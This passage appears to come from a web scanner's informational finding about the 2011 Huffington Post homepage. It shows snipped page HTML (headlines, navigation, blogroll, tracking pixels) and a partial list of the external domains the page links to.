<h1>Using a mobile device? Go to <a href="http://m.huffpost.com">m.huffpost.com</a>
...[SNIP]...
<div class="huffpo_logo_lightbox">
                           <img src="http://s.huffpost.com/images/social-profile/lightbox/huffpo_logo_lightbox_beta.png" width="368" height="36" alt="" />
                       </div>
...[SNIP]...
<div id="huffpo_snn_is_loading" style="width:100%; text-align:center;"><img width="32" height="32" src="http://s.huffpost.com/images/loader.gif" alt="" /></div>
...[SNIP]...
<div id="qr_tab_read_col1" class="column first">
<img class="spinner" alt="" src="http://s.huffpost.com/images/quickview/gear_animation.gif" width="32" height="32" />
</div>
...[SNIP]...
<div id="qr_tab_news_col1" class="column first">
<img class="spinner" alt="" src="http://s.huffpost.com/images/quickview/gear_animation.gif" width="32" height="32" />
</div>
...[SNIP]...

                       <img src="http://s.huffpost.com/images/v/logos/aol_cobrand/homepage.png" width="760" height="67" alt="homepage" />
           
...[SNIP]...
<li class="center" style="border-right:medium none; width:138px;">
                   <a href="http://www.autoblog.com/" class="black border_dotted_ccc">AUTOBLOG</a>
...[SNIP]...
</a>
                   <a href="http://music.aol.com/" class="black border_dotted_ccc">MUSIC</a>
                   <a href="http://www.popeater.com/" class="black">POPEATER</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:115px;">
                   <a href="http://moviefone.com/" class="black border_dotted_ccc">MOVIEFONE</a>
                   <a href="http://television.aol.com/" class="black border_dotted_ccc">TV</a>
                   <a href="http://video.aol.com/" class="black">VIDEO</a>
...[SNIP]...
</a>
                   <a href="http://www.engadget.com/" class="black border_dotted_ccc">ENGADGET</a>
                   <a href="http://www.tuaw.com/" class="black">APPLE BLOG</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:120px;">
                   <a href="http://techcrunch.com/" class="black border_dotted_ccc">TECHCRUNCH</a>
                   <a href="http://www.joystiq.com/" class="black border_dotted_ccc">JOYSTIQ</a>
                   <a href="http://translogic.aolautos.com/" class="black">TRANSLOGIC</a>
...[SNIP]...
</a>
                   <a href="http://www.comicsalliance.com/" class="black">COMICS</a>
...[SNIP]...
</a>
                   <a href="http://www.mmafighting.com/" class="black">MMA FIGHTING</a>
...[SNIP]...
</a>
                   <a href="http://www.shelterpop.com/" class="black">HOME/DIY</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:90px;">
                   <a href="http://www.stylelist.com/" class="black border_dotted_ccc">STYLELIST</a>
...[SNIP]...
</a>
                   <a href="http://www.kitchendaily.com" class="black">RECIPES</a>
...[SNIP]...
</a>
                   <a href="http://www.patch.com/" class="black border_dotted_ccc">PATCH</a>
                   <a href="http://www.mapquest.com/" class="black">MAPQUEST</a>
...[SNIP]...
<li class="n_default"><a href="http://www.games.com/">GAMES</a>
...[SNIP]...
<li class="n_default"><a href="http://www.popeater.com">POPEATER</a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html" id="entry_id_0" >

                                                                                   <img id="headline_image" class="quickread_link" width="900" height="350" src="http://i.huffpost.com/gen/273980/thumbs/r-BARACK-OBAMA-OSAMA-BIN-LADEN-huge.jpg" />
                                                                                                   </a>
...[SNIP]...
<a href="#" onclick="javascript:window.external.AddToFavoritesBar('http://www.huffingtonpost.com/webslices/?v=home#home_slice', 'Home', 'slice');">
       <img src="http://s.huffpost.com/images/webslice12x12.png" width="12" height="12" alt="IE8 Web Slice" />
   </a>
...[SNIP]...
<div class="float_left" style="width:45px; height:31px; margin:0 5px;"><img src="http://s.huffpost.com/images/v/blog_column.png" width="44" height="31" /></div>
...[SNIP]...
<a href="/arianna-huffington"><img src="http://s.huffpost.com/contributors/arianna-huffington/headshot.jpg" width="45" height="45" alt="Arianna Huffington" /></a>
...[SNIP]...
<h4><a href="http://www.reuters.com/subjects/bin-laden-compound" target="_hplink">Photos Show 3 Dead Men At Bin Laden Compound (GRAPHIC)</a>
...[SNIP]...
<div class="image_wrapper "><a href="http://www.reuters.com/subjects/bin-laden-compound" target="_hplink"><img class="unloaded-image quickread_link" id="image_857719" longdesc="http://i.huffpost.com/gen/273951/thumbs/s-OSAMA-BIN-LADEN-PHOTOS-large300.jpg" alt="Osama Bin Laden Photos" width="300" height="21
...[SNIP]...
<h4 class="subhead"><a href="http://www.reuters.com/subjects/bin-laden-compound" target="_hplink"></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/administration-bin-laden-waterboarding_n_857529.html"><a href="http://www.nytimes.com/2011/05/04/us/politics/04torture.html"><em>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/william-h-mcraven-univers_n_857584.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<span class="afb-icon">
       <img class="apps-feeds_image" alt="Facebook" src="http://s.huffpost.com/images/blank.gif"/>
    </span>
...[SNIP]...
<span class="afb-icon">
                   <img class="apps-feeds_image" alt="Twitter" src="http://s.huffpost.com/images/blank.gif"/>
               </span>
...[SNIP]...
<span class="afb-icon" >
       <img class="apps-feeds_image" alt="Apple" src="http://s.huffpost.com/images/blank.gif"/>
               </span>
...[SNIP]...
<a class="afb-icon" onclick="HPTrack.Module('follow').click('Android');" href="/p/huffingtonpost-android-ap.html" target="_blank">
       <img class="apps-feeds_image" alt="Android" src="http://s.huffpost.com/images/blank.gif"/>
    </a>
...[SNIP]...
<li id="af-blackberry" class="apps-feeds_button">
    <a class="afb-icon" onclick="HPTrack.Module('follow').click('Blackberry');" href="http://appworld.blackberry.com/webstore/content/19143" target="_blank">
       <img class="apps-feeds_image" alt="Blackberry" src="http://s.huffpost.com/images/blank.gif"/>
       </a>
...[SNIP]...
<a class="afb-icon" href="/subscription/" onclick="HPTrack.Module('follow').click('Email'); QuickSubscribeUser.pop2(); return false;" target="_blank">
                   <img class="apps-feeds_image" alt="Email" src="http://s.huffpost.com/images/blank.gif"/>
               </a>
...[SNIP]...
<a class="afb-icon" onclick="HPTrack.Module('follow').click('Rss');" href="/syndication/" target="_blank">
       <img class="apps-feeds_image" alt="Rss" src="http://s.huffpost.com/images/blank.gif"/>
    </a>
...[SNIP]...
<a href="#" id="facebook_promo_link"><img src="http://s.huffpost.com/images/facebook_promo_connect.png?3" class="facebook_promo_connect" width="230" height="44" /></a>
...[SNIP]...
<div class="snn_twitter_loading_img"><img width="32" height="32" src="http://s.huffpost.com/images/loader.gif" alt="" /></div>
...[SNIP]...
<div class="snp_most_popular_entry_image">
       <a href="http://royalwedding.aol.com/2011/05/02/pippa-middleton-boyfriend-engagement/" class="track_lightbox_quickread" onclick="return QV.pop(this); return false;">
                           <img border="0" src="/images/trans.gif" longdesc="http://www.blogcdn.com/royalwedding.aol.com/media/2011/05/pippa10facts_74x58.jpg" alt="" class="img_border unloaded-image" />
...[SNIP]...
<div class="snp_most_popular_entry_desc">
       <a class="arial_13 black bold snp_entry_title track_lightbox_quickread" onclick="return QV.pop(this); return false;" href="http://royalwedding.aol.com/2011/05/02/pippa-middleton-boyfriend-engagement/">AOL Royal Wedding: 10 Things You Should Know About Pippa Middleton</a>
...[SNIP]...
<div class="snp_most_popular_entry_image">
       <a href="http://realestate.aol.com/blog/2011/05/02/real-estate-tough-sell-the-too-custom-home/" class="track_lightbox_quickread" onclick="return QV.pop(this); return false;">
                           <img border="0" src="/images/trans.gif" longdesc="http://www.blogcdn.com/realestate.aol.com/blog/media/2011/05/3843-22nd-st-pool-1304375357_74x58.jpg" alt="" class="img_border unloaded-image" /
...[SNIP]...
<div class="snp_most_popular_entry_desc">
       <a class="arial_13 black bold snp_entry_title track_lightbox_quickread" onclick="return QV.pop(this); return false;" href="http://realestate.aol.com/blog/2011/05/02/real-estate-tough-sell-the-too-custom-home/">AOL Real Estate: Real Estate Tough Sell: The Too-Custom Home</a>
...[SNIP]...
<a href="#" onclick="SayIt.pop_email_form(); return false;">
           <img src="http://s.huffpost.com/images/v/something_to_say_button.png" width="300" height="58" alt="If you have something to say... Say it on the Huffington Post" />
       </a>
...[SNIP]...
<h4><a href="http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/" target="_hplink">Drunk British Airways Passenger Reportedly Gropes Flight Attendant</a>
...[SNIP]...
<div class="image_wrapper "><a href="http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/" target="_hplink"><img class="unloaded-image quickread_link" id="image_857316" longdesc="http://i.huffpost.com/gen/274035/thumbs/s-ALCOHOL-large300.jpg" alt="Alcohol" width="300" height="219" src="/images/trans.gif" />
...[SNIP]...
<h4 class="subhead"><a href="http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/" target="_hplink"></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/panda-peacock-animal-chase_n_857572.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/unemployment-up-divorce-down_n_857503.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<h4><a href="http://aol.com/video/930944537001" target="_hplink">Proof That Some Dogs Can Talk?</a>
...[SNIP]...
<div class="image_wrapper "><a href="http://aol.com/video/930944537001" target="_hplink"><img class="unloaded-image quickread_link" id="image_857475" longdesc="http://i.huffpost.com/gen/273725/thumbs/s-DOG-large300.jpg" alt="Dog" width="300" height="219" src="/images/trans.gif" />
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/pandora-comedy-clips_n_857428.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/03/mac-os-x-tips-tricks_n_855102.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/jon-stewart-rips-pakistan_n_857329.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<li><a href="http://abcnews.go.com/" target="_blank">ABC</a></li>
<li><a href="http://www.accesshollywood.com" target="_blank">Access Hollywood</a>
...[SNIP]...
<li><a href="http://english.aljazeera.net/" target="_blank">Al Jazeera</a>
...[SNIP]...
<li><a href="http://news.aol.com/" target="_blank">AOL News</a>
...[SNIP]...
<li><a href="http://www.theatlantic.com/" target="_blank">The Atlantic</a>
...[SNIP]...
<li><a href="http://news.bbc.co.uk/" target="_blank">BBC</a></li>
<li><a href="http://www.bloomberg.com/" target="_blank">Bloomberg</a></li>
<li><a href="http://www.boston.com/news/globe/" target="_blank">Boston Globe</a>
...[SNIP]...
<li><a href="http://www.c-span.org" target="_blank">C-SPAN</a></li>
<li><a href="http://www.cbsnews.com/" target="_blank">CBS</a></li>
<li><a href="http://www.suntimes.com/" target="_blank">Chicago Sun-Times</a>
...[SNIP]...
<li><a href="http://www.chicagotribune.com/" target="_blank">Chicago Tribune</a>
...[SNIP]...
<li><a href="http://www.csmonitor.com/" target="_blank">Christian Science Monitor</a>
...[SNIP]...
<li><a href="http://www.publicintegrity.org/" target="_blank">Center for Public Integrity</a>
...[SNIP]...
<li><a href="http://www.cnn.com/" target="_blank">CNN</a></li>
<li><a href="http://www.cq.com" target="_blank">Congressional Quarterly</a>
...[SNIP]...
<li><a href="http://www.telegraph.co.uk/" target="_blank">Daily Telegraph</a>
...[SNIP]...
<li><a href="http://www.democracynow.org/" target="_blank">Democracy Now!</a>
...[SNIP]...
<li><a href="http://drudgereport.com/" target="_blank">Drudge Report</a>
...[SNIP]...
<li><a href="http://www.eonline.com/" target="_blank">E! Online</a></li>
<li><a href="http://www.ew.com/" target="_blank">Entertainment Weekly</a>
...[SNIP]...
<li><a href="http://www.forbes.com/" target="_blank">Forbes</a></li>
<li><a href="http://money.cnn.com/magazines/fortune/" target="_blank">Fortune</a>
...[SNIP]...
<li><a href="http://www.foxnews.com/" target="_blank">Fox News</a></li>
<li><a href="http://news.ft.com/home/us" target="_blank">Financial Times</a>
...[SNIP]...
<li><a href="http://www.theglobeandmail.com/" target="_blank">Globe and Mail</a>
...[SNIP]...
<li><a href="http://www.GlobalPost.com" target="_blank">GlobalPost.com</a>
...[SNIP]...
<li><a href="http://www.globalvoicesonline.org/" target="_blank">GlobalVoices</a>
...[SNIP]...
<li><a href="http://news.google.com/" target="_blank">Google News</a>
...[SNIP]...
<li><a href="http://www.guardian.co.uk/" target="_blank">Guardian</a></li>
<li><a href="http://thehill.com/" target="_blank">The Hill</a></li>
<li><a href="http://news.independent.co.uk/" target="_blank">Independent</a>
...[SNIP]...
<li><a href="http://www.latimes.com/" target="_blank">Los Angeles Times</a>
...[SNIP]...
<li><a href="http://www.mcclatchydc.com/" target="_blank">McClatchy</a></li>
<li><a href="http://www.mediaite.com/" target="_blank">Mediaite</a></li>
<li><a href="http://www.linktv.org/mosaic/" target="_blank">Mosaic</a></li>
<li><a href="http://www.motherjones.com/" target="_blank">Mother Jones</a>
...[SNIP]...
<li><a href="http://www.msnbc.msn.com/" target="_blank">MSNBC</a></li>
<li><a href="http://nydailynews.com/" target="_blank">New York Daily News</a>
...[SNIP]...
<li><a href="http://www.observer.com/" target="_blank">New York Observer</a>
...[SNIP]...
<li><a href="http://www.nytimes.com/" target="_blank">New York Times</a>
...[SNIP]...
<li><a href="http://www.npr.org/" target="_blank">NPR</a></li>
<li><a href="http://www.pbs.org/newshour/" target="_blank">PBS NewsHour</a>
...[SNIP]...
<li><a href="http://www.newsweek.com" target="_blank">Newsweek</a></li>
<li><a href="http://www.people.com/people" target="_blank">People</a></li>
<li><a href="http://www.politico.com/" target="_blank">Politico</a></li>
<li><a href="http://www.propublica.org/"target="_blank">ProPublica</a>
...[SNIP]...
<li><a href="http://www.reuters.com/" target="_blank">Reuters</a>
...[SNIP]...
<li><a href="http://www.rollcall.com/" target="_blank">Roll Call</a></li>
<li><a href="http://rollingstone.com" target="_blank">Rolling Stone</a>
...[SNIP]...
<li><a href="http://www.theroot.com" target="_blank">The Root</a></li>
<li><a href="http://www.salon.com/" target="_blank">Salon</a></li>
<li><a href="http://www.sfgate.com/" target="_blank">San Francisco Chronicle</a>
...[SNIP]...
<li><a href="http://www.slate.com/" target="_blank">Slate</a></li>
<li><a href="http://reporting.sunlightfoundation.com/blog/" target="_blank">Sunlight Foundation</a>
...[SNIP]...
<li><a href="http://www.time.com/time/?xid=huffpo-direct" target="_blank">TIME</a></li>
<li><a href="http://www.timesonline.co.uk/section/0,,3,00.html" target="_blank">Times Of London</a>
...[SNIP]...
<li><a href="http://www.tmz.com" target="_blank">TMZ</a></li>
<li><a href="http://www.usatoday.com/" target="_blank">USA Today</a></li>
<li><a href="http://www.vanityfair.com/" target="_blank">Vanity Fair</a>
...[SNIP]...
<li><a href="http://wsj.com/" target="_blank">Wall Street Journal</a>
...[SNIP]...
<li><a href="http://www.washingtonindependent.com/" target="_blank">Washington Independent</a>
...[SNIP]...
<li><a href="http://www.washingtontimes.com/" target="_blank">Washington Times</a>
...[SNIP]...
<li><a href="http://www.washingtonpost.com/" target="_blank">Washington Post</a>
...[SNIP]...
<li><a href="http://news.yahoo.com/" target="_blank">Yahoo! News</a>
...[SNIP]...
<li><a href=http://www.youthradio.org/>Youth Radio</a>
...[SNIP]...
<li><a href="http://americablog.blogspot.com/" target="_blank">Americablog</a>
...[SNIP]...
<li><a href="http://andrewsullivan.theatlantic.com/" target="_blank">Andrew Sullivan</a>
...[SNIP]...
<li><a href="http://www.bagnewsnotes.com/" target="_blank">BagNewsNotes</a>
...[SNIP]...
<li><a href="http://bloggingheads.tv/" target="_blank">Bloggingheads</a>
...[SNIP]...
<li><a href="http://boingboing.net/" target="_blank">Boing Boing</a>
...[SNIP]...
<li><a href="http://bravenewfilms.org/" target="_blank">Brave New Films</a>
...[SNIP]...
<li><a href="http://www.buzzfeed.com/" target="_blank">BuzzFeed</a></li>
<li><a href="http://www.buzzmachine.com/" target="_blank">BuzzMachine</a>
...[SNIP]...
<li><a href="http://www.nationalreview.com/thecorner/corner.asp" target="_blank">The Corner (National Review)</a>
...[SNIP]...
<li><a href="http://mediamatters.org/blog/" target="_blank">County Fair (Media Matters)</a>
...[SNIP]...
<li><a href="http://www.crooksandliars.com/" target="_blank">Crooks and Liars</a>
...[SNIP]...
<li><a href="http://dailycaller.com/" target="_blank">Daily Caller</a>
...[SNIP]...
<li><a href="http://dailykos.com/" target="_blank">Daily Kos</a></li>
<li><a href="http://www.slate.com/blogs/blogs/weigel/" target="_blank">David Weigel</a>
...[SNIP]...
<li><a href="http://democracyarsenal.org/" target="_blank">Democracy Arsenal</a>
...[SNIP]...
<li><a href="http://blogs.reuters.com/felix-salmon/" target="_blank">Felix Salmon</a>
...[SNIP]...
<li><a href="http://firedoglake.com/" target="_blank">Firedoglake</a>
...[SNIP]...
<li><a href="http://fivethirtyeight.blogs.nytimes.com/" target="_blank">FiveThirtyEight</a>
...[SNIP]...
<li><a href="http://www.FrumForum.com" target="_blank">FrumForum</a></li>
<li><a href="http://www.funnyordie.com/" target="_blank">Funny or Die</a>
...[SNIP]...
<li><a href="http://blogs.abcnews.com/george/" target="_blank">George's Bottom Line (George Stephanopoulos)</a>
...[SNIP]...
<li><a href="http://www.gothamist.com" target="_blank">Gothamist</a></li>
<li><a href="http://hotlineblog.nationaljournal.com/" target="_blank">Hotline On Call (National Journal)</a>
...[SNIP]...
<li><a href="http://digbysblog.blogspot.com/">Hullabaloo</a>
...[SNIP]...
<li><a href="http://www.juancole.com/" target="_blank">Informed Comment</a>
...[SNIP]...
<li><a href="http://www.instapundit.com/" target="_blank">Instapundit</a>
...[SNIP]...
<li><a href="http://www.theatlantic.com/james-fallows/" target="_blank">James Fallows</a>
...[SNIP]...
<li><a href="http://www.vanityfair.com/online/wolcott" target="_blank">James Wolcott (Vanity Fair)</a>
...[SNIP]...
<li><a href="http://www.theatlantic.com/joshua-green/" target="_blank">Joshua Green</a>
...[SNIP]...
<li><a href="http://www.newsweek.com/blogs/kausfiles.html" target="_blank">Kausfiles (Newsweek)</a>
...[SNIP]...
<li><a href="http://www.kottke.org/" target="_blank">kottke.org</a>
...[SNIP]...
<li><a href="http://www.kcrw.com/news/programs/lr" target="_blank">Left, Right and Center</a>
...[SNIP]...
<li><a href="http://themoderatevoice.com/" target="_blank">The Moderate Voice</a>
...[SNIP]...
<li><a href="http://www.ndnblog.com" target="_blank">NDN Blog</a></li>
<li><a href="http://www.thenation.com/blogs/notion" target="_blank">The Notion (Nation)</a>
...[SNIP]...
<li><a href="http://www.pandagon.net/" target="_blank">Pandagon</a></li>
<li><a href="http://krugman.blogs.nytimes.com/" target="_blank">Paul Krugman</a>
...[SNIP]...
<li><a href="http://www.washingtonmonthly.com/" target="_blank">Political Animal (Washington Monthly)</a>
...[SNIP]...
<li><a href="http://politicalwire.com/" target="_blank">Political Wire</a>
...[SNIP]...
<li><a href="http://www.rawstory.com" target="_blank">Raw Story</a></li>
<li><a href="http://redstate.com/" target="_blank">Redstate.com</a>
...[SNIP]...
<li><a href="http://www.seeingtheforest.com/" target="_blank">Seeing The Forest</a>
...[SNIP]...
<li><a href="http://time-blog.com/swampland/" target="_blank">Swampland (Time)</a>
...[SNIP]...
<li><a href="http://talkleft.com/" target="_blank">TalkLeft</a></li>
<li><a href="http://www.talkingpointsmemo.com/" target="_blank">Talking Points Memo</a>
...[SNIP]...
<li><a href="http://www.prospect.org/weblog/" target="_blank">Tapped (American Prospect)</a>
...[SNIP]...
<li><a href="http://www.taylormarsh.com/" target="_blank">Taylor Marsh</a>
...[SNIP]...
<li><a href="http://www.thatminoritything.com/" target="_blank">That Minority Thing</a>
...[SNIP]...
<li><a href="http://www.truthdig.com/" target="_blank">Truthdig</a></li>
<li><a href="http://www.thinkprogress.org/" target="_blank">Think Progress</a>
...[SNIP]...
<li><a href="http://www.thismodernworld.com/" target="_blank">This Modern World</a>
...[SNIP]...
<li><a href="http://www.usnews.com/usnews/politics/whispers/whisphome.htm" target="_blank">Washington Whispers (US News & World Report)</a>
...[SNIP]...
<li><a href="http://www.wonkette.com/" target="_blank">Wonkette</a></li>
<li><a href="http://www.theyoungturks.com/" target="_blank">The Young Turks</a>
...[SNIP]...
<li><a href="http://www.thenation.com/authors/eric-alterman" target="_blank">Eric Alterman</a>
...[SNIP]...
<li><a href="http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/davidbrooks/index.html" target="_blank">David Brooks</a>
...[SNIP]...
<li><a href="http://www.nationaljournal.com/columns/political-connections">Ron Brownstein</a>
...[SNIP]...
<li><a href="http://www.observer.com/opinions_conason.asp" target="_blank">Joe Conason</a>
...[SNIP]...
<li><a href="http://www.davidcorn.com" target="_blank">David Corn</a>
...[SNIP]...
<li><a href="http://www.nydailynews.com/topics/Stanley+Crouch" target="_blank">Stanley Crouch</a>
...[SNIP]...
<li><a href="http://www.washingtonpost.com/wp-dyn/content/linkset/2005/04/22/LI2005042201099.html" target="_blank">EJ Dionne</a></li>
<li><a href="http://www.marketwatch.com/News/Story/Story.aspx?column=Jon+Friedman%27s+Media+Web&siteid=mktw&dist=" target="_blank">Jon Friedman</a>
...[SNIP]...
<li><a href="http://www.opinionjournal.com/diary/" target="_blank">John Fund</a></li>
<li><a href="http://www.thedailybeast.com/author/howard-kurtz/" target="_blank">Howard Kurtz</a>
...[SNIP]...
<li><a href="http://www.hitchensweb.com/" target="_blank">Christopher Hitchens</a>
...[SNIP]...
<li><a href="http://www.nationalreview.com/lowry/lowry.asp/" target="_blank">Rich Lowry</a>
...[SNIP]...
<li><a href="http://www.thenation.com/blogs/thebeat " target="_blank">John Nichols</a>
...[SNIP]...
<li><a href="http://online.wsj.com/public/page/peggy-noonan.html" target="_blank">Peggy Noonan</a>
...[SNIP]...
<li><a href="http://slate.msn.com/?id=3944&cp=68090&nav=navom" target="_blank">Jack Shafer</a>
...[SNIP]...
<li><a href="http://blogs.suntimes.com/sweet/" target="_blank">Lynn Sweet</a>
...[SNIP]...
<li><a href="http://www.washingtonpost.com/wp-dyn/content/linkset/2005/03/24/LI2005032402294.html" target="_blank">George Will</a>
...[SNIP]...
<li><a href="http://www.newser.com/off-the-grid/author/16/michael-wolff.html" target="_blank">Michael Wolff</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:138px;">
                   <a href="http://www.autoblog.com/" class="black border_dotted_ccc">AUTOBLOG</a>
...[SNIP]...
</a>
                   <a href="http://music.aol.com/" class="black border_dotted_ccc">MUSIC</a>
                   <a href="http://www.popeater.com/" class="black">POPEATER</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:115px;">
                   <a href="http://moviefone.com/" class="black border_dotted_ccc">MOVIEFONE</a>
                   <a href="http://television.aol.com/" class="black border_dotted_ccc">TV</a>
                   <a href="http://video.aol.com/" class="black">VIDEO</a>
...[SNIP]...
</a>
                   <a href="http://www.engadget.com/" class="black border_dotted_ccc">ENGADGET</a>
                   <a href="http://www.tuaw.com/" class="black">APPLE BLOG</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:120px;">
                   <a href="http://techcrunch.com/" class="black border_dotted_ccc">TECHCRUNCH</a>
                   <a href="http://www.joystiq.com/" class="black border_dotted_ccc">JOYSTIQ</a>
                   <a href="http://translogic.aolautos.com/" class="black">TRANSLOGIC</a>
...[SNIP]...
</a>
                   <a href="http://www.comicsalliance.com/" class="black">COMICS</a>
...[SNIP]...
</a>
                   <a href="http://www.mmafighting.com/" class="black">MMA FIGHTING</a>
...[SNIP]...
</a>
                   <a href="http://www.shelterpop.com/" class="black">HOME/DIY</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:90px;">
                   <a href="http://www.stylelist.com/" class="black border_dotted_ccc">STYLELIST</a>
...[SNIP]...
</a>
                   <a href="http://www.kitchendaily.com" class="black">RECIPES</a>
...[SNIP]...
</a>
                   <a href="http://www.patch.com/" class="black border_dotted_ccc">PATCH</a>
                   <a href="http://www.mapquest.com/" class="black">MAPQUEST</a>
...[SNIP]...
<li class="n_default"><a href="http://www.games.com/">GAMES</a>
...[SNIP]...
<li class="n_default"><a href="http://www.techcrunch.com">TECHCRUNCH</a>
...[SNIP]...
<li><a href="http://sixapart.com">Powered by Movable Type</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6723616&c3=&c4=&c5=front&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<noscript>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-703240h&cg=0&cc=1&ts=noscript" width="1" height="1" alt="" />
</noscript>
...[SNIP]...
<noscript>
<img src="http://vertical-stats.huffpost.com/?-1&&" width="1" height="1" alt="" />
</noscript>
...[SNIP]...
<noscript>
<img src="//pixel.quantserve.com/pixel/p-6fTutip1SMLM2.gif?labels=Home" style="display:none" height="1" width="1" alt="Quantcast" />
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
<a href="#" class="close_modal" onclick="Modal.hideMask('hp_vertical_common_lightbox');return false;">
           <img width="70" height="22" alt="" src="http://s.huffpost.com/images/modal/close-home.gif" />
        </a>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

16.86. http://www.huffingtonpost.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.huffingtonpost.com/?icid=navbar_huffpo_main5

The response contains the following links to other domains:

http://abcnews.go.com/
http://ads.pubmatic.com/AdServer/js/universalpixel.js
http://americablog.blogspot.com/
http://andrewsullivan.theatlantic.com/
http://aol.com/video/930944537001
http://appworld.blackberry.com/webstore/content/19143
http://b.scorecardresearch.com/p?c1=2&c2=6723616&c3=&c4=&c5=front&c6=&c15=&cj=1
http://bloggingheads.tv/
http://blogs.abcnews.com/george/
http://blogs.reuters.com/felix-salmon/
http://blogs.suntimes.com/sweet/
http://boingboing.net/
http://bravenewfilms.org/
http://dailycaller.com/
http://dailykos.com/
http://democracyarsenal.org/
http://digbysblog.blogspot.com/
http://drudgereport.com/
http://english.aljazeera.net/
http://firedoglake.com/
http://fivethirtyeight.blogs.nytimes.com/
http://hotlineblog.nationaljournal.com/
http://i.huffpost.com/gen/273980/thumbs/r-BARACK-OBAMA-OSAMA-BIN-LADEN-huge.jpg
http://krugman.blogs.nytimes.com/
http://m.huffpost.com/
http://mediamatters.org/blog/
http://money.cnn.com/magazines/fortune/
http://moviefone.com/
http://music.aol.com/
http://news.aol.com/
http://news.bbc.co.uk/
http://news.ft.com/home/us
http://news.google.com/
http://news.independent.co.uk/
http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/
http://news.yahoo.com/
http://nydailynews.com/
http://o.aolcdn.com/ads/adsWrapper.js
http://online.wsj.com/public/page/peggy-noonan.html
http://pixel.quantserve.com/pixel/p-6fTutip1SMLM2.gif?labels=Home
http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
http://politicalwire.com/
http://realestate.aol.com/blog/2011/05/02/real-estate-tough-sell-the-too-custom-home/
http://redstate.com/
http://reporting.sunlightfoundation.com/blog/
http://rollingstone.com/
http://royalwedding.aol.com/2011/05/02/pippa-middleton-boyfriend-engagement/
http://s.huffpost.com/assets/css.php?f=commercial.css%2Csnp_friends.css%2Csnn-header.css%2Chp_modules%2Fmodule.splash_slideshow.css%2Chp_modules%2Fmodule.apps_feeds.css%2Chufflists.css%2Csignup_modal.css%2Cdirect_message.css%2Cbadges_v2.css%2Chp_modules%2Ffacebook.css%2Cuser_levels.css%2Ctwitter_splash.css%2Cbing.css%2Cgrouping.css%2Cmodal_frames.css%2Chp_modules%2Fmodule.bubble.css%2Cemail_share.css&v46755
http://s.huffpost.com/assets/css.php?f=fonts%2Fhelvetica%2Fstylesheet.css%2Chp_modules%2Ftop_nav.css%2Cverticals%2Fhomepage.css%2Cfrontpage.css%2Cbasic.css%2Call_pages.css%2Cverticals%2Fcolor_scheme.css%2Cadd%2Ffront.css%2Cbuttons.css%2Cmost_popular.css&v46770
http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Cflashobjectmin.js%2Cjsonmin.js%2Ccookiesmin.js%2Cv%2Fblogroll.js%2Chp_track.js%2Chp_util.js%2Cjquery%2Fcolor.jquery.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cjquery%2Fjquery.jdMenu.js%2Cprovider.js%2Cquickview.js%2Cshare.js%2Cposts.js%2Crefresh.js%2Cmost_popular.js%2Cfacebook.js%2Cgeopromo.js%2Csnproject.js%2Clazyload-min.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Cbalance_columns.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csitemode.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Csplash_slideshow.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Cuser_levels.js%2Ctwitter_splash.js%2Csharer.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Ctwitter%2Ffrontpage.js%2Chptwitter.js%2Capp-feeds.js&v47007
http://s.huffpost.com/assets/js.php?f=v.js&v47014
http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js
http://s.huffpost.com/contributors/arianna-huffington/headshot.jpg
http://s.huffpost.com/images/blank.gif
http://s.huffpost.com/images/facebook_promo_connect.png?3
http://s.huffpost.com/images/hoton_twitter3.png
